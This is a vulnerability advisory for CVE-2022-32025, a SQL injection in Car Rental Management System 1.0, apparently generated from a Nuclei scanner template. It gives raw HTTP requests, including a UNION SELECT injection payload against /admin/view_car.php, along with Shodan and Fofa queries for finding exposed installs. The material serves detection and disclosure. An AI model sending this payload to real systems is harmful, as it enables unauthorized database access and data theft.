| Title | Car Rental Management System 1.0 - SQL Injection |
|---|---|
| Author | arafatansari |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.11785 |
| CVE ID | CVE-2022-32025 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:"Car Rental Management System"http.html:"car rental management system" |
| Fofa Query | body="car rental management system" |
| Tags | cve cve2022 carrental cms sqli authenticated car_rental_management_system_project vuln |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
POST /admin/ajax.php?action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=Rq9Jga%23&password=Qrl9dz
GET /admin/view_car.php?id=-1%20union%20select%201,md5(6081),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32025.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-32025.pcap
N/AN/A